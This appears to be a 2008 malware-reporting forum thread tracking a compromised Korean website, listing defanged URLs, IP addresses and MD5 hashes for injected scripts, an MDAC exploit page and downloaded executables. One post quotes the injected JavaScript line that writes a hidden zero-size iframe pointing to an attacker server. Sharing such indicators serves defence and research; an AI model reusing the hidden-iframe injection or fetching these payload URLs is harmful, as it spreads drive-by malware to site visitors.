Author Topic: hxxp://www.fpskorea.com/ (Read 6621 times)

pcaccent · July 22, 2008, 11:09:46 pm

Quote

hxxp://www.fpskorea.com/
hxxp://www.fpskorea.com/js/common.js
hxxp://222.122.138.124/A.exe

JohnC · July 24, 2008, 02:18:40 pm

Thank you.

philipp · July 25, 2008, 02:20:44 pm

common.js now loads the following url in an iframe:
hxxp://222.122.138.92/index.htm
which serves an MDAC exploit, downloading:
hxxp://222.122.138.92/UU.exe (md5sum 965583b539fb59b643c7bdd83e269a7e)

after execution, it downloads:
hxxp://www.microsoftmg.com/xxc/ddr.rar (md5sum 648feff7d9cea5e331251dce9cdffc24)
hxxp://www.mgmicrosoft.com/xmfx/help1.rar (md5sum 522707b9255de5d662e2349576f5214b)
hxxp://www.mgmicrosoft.com/xmfx/help.rar (md5sum 648feff7d9cea5e331251dce9cdffc24)

(ddr.rar == help.rar)

pcaccent · July 27, 2008, 08:53:27 am

Thank you philipp

Quote

hxxp://www.fpskorea.com/js/common.js
document.write('<iframe height=0 width=0 src="hxxp://61.100.183.93/index.htm"></iframe>');
hxxp://61.100.183.93/WV.exe

pcaccent · August 19, 2008, 02:28:29 pm

Quote

hxxp://www.fpskorea.com/
hxxp://218.38.28.100/IMG/ad.js
hxxp://218.38.28.100/IMG/ad.htm
hxxp://www.icch.or.kr/d/d/on.exe

Aug 19, 2008, 11:30:44 PM(GMT+9)
from Seoul, Korea

pcaccent · August 22, 2008, 12:38:44 am

Quote

hxxp://www.fpskorea.com/
hxxp://www.2bkr.com/css/css.js
hxxp://www.2bkr.com/css/index.htm
hxxp://www.2bkr.com/css/down.exe

2bkr.com ip: 118.219.254.17
mydearsister.net ip : 118.219.254.17 // same

JohnC · August 24, 2008, 10:09:59 pm

Thank you.

Author Topic: hxxp://www.fpskorea.com/ (Read 6621 times)

pcaccent

hxxp://www.fpskorea.com/

JohnC

Re: hxxp://www.fpskorea.com/

philipp

Re: hxxp://www.fpskorea.com/

pcaccent

Re: hxxp://www.fpskorea.com/

pcaccent

Re: hxxp://www.fpskorea.com/

pcaccent

Re: hxxp://www.fpskorea.com/

JohnC

Re: hxxp://www.fpskorea.com/